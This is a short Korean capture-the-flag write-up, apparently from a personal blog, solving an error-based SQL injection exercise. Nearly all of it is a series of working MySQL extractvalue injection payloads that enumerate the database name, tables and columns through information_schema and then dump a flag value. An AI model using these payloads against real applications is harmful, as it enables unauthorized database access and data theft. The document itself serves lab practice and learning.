320x100
SQL Injection 포인트 찾기
공격 format 만들기
normaltic' and extractvalue('1', concat(0x3a, (select 'normaltic'))) and '1'='1
DB 이름 출력해보기 : sqli_2_2
- table 이름 알아내기 flagTable_this → member
select table_name from information_schema.tables where table_schema=’sqli_2_2’
normaltic' and extractvalue('1', concat(0x3a, (select table_name from information_schema.tables where table_schema='sqli_2_2' limit 0,1))) and '1'='1
- 컬럼이름 추출하기 idx → flag
normaltic' and extractvalue('1',concat(0x3a,(select column_name from information_schema.columns where table_name='flagTable_this' limit 0,1))) and '1'='1
- 데이터 추출하기
normaltic' and extractvalue('1',concat(0x3a,(select flag from flagTable_this limit 0,1))) and '1'='1
300x250
'Information Technology > write-up' 카테고리의 다른 글
| SQL Injection 4 error based SQLi (0) | 2025.05.28 |
|---|---|
| SQL Injection 3 (error based) (0) | 2025.05.28 |
| SQL Injection (Blind Practice) (0) | 2025.05.28 |
| SQL Injection (Error Based SQLi Basic) - extractvalue (0) | 2025.05.28 |
| SQL Injection 2 - order by, union, limit (0) | 2025.05.28 |